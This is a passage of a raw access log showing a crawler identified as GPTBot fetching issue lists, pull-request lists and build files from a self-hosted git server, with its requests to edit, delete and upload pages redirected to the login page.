AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10247] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10075] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:45:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:45:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16401] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:18:45:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 11146] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:18:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15828] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:18:45:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:45:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&state=all&type=all" -[17/Feb/2026:18:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[17/Feb/2026:18:45:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10143] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10009] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:45:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10230] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:45:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:45:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile?display=rendered" [Client 74.7.227.38] [Length 11258] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 5210] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 897] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/TestApp" [Client 74.7.227.38] [Length 28192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/TestApp" -[17/Feb/2026:18:45:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16403] [Gzip 9.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10042] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:45:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 991] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 9871] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 17344] [Gzip 10.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19707] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:18:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 11112] [Gzip 3.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build" -[17/Feb/2026:18:45:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 10999] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" -[17/Feb/2026:18:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=closed&type=all" -[17/Feb/2026:18:45:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:18:45:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=open&type=all" -[17/Feb/2026:18:45:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=closed&type=all" -[17/Feb/2026:18:45:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:36 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/Makefile" -[17/Feb/2026:18:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:45:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:18:45:37 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:18:45:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles" -[17/Feb/2026:18:45:38 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject/build/CMakeFiles" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 